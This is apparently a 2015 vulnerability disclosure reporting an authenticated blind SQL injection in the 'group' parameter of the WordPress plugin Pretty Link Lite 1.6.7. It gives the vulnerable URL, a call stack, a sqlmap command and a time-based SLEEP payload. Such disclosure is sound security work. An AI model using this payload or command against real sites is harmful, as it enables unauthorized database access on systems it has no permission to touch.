Subject: Blind SQL injection in Pretty Link Lite 1.6.7
Date: Wed, 8 Jul 2015 11:43:47 +0200


Plugin: Pretty Link Lite 1.6.7

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection (PrliLinksController::list_links())

Method: GET
URL: http://localhost/wp-admin/admin.php?page=pretty-link&group=1
Vulnerable parameter: group

Example PHP callstack;
PrliLinksController::route   [/pretty-link/classes/controllers/PrliLinksController.php:34]
PrliLinksController::list_links   [/pretty-link/classes/controllers/PrliLinksController.php:65]

Sqlmap verification:

sqlmap --dbms mysql --cookie "..." -u "http://localhost/wp-admin/admin.php?page=pretty-link&group=1" -p group

Parameter: group (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=pretty-link&group=1 AND (SELECT * FROM (SELECT(SLEEP(5)))VFpT)

Marcin Probola,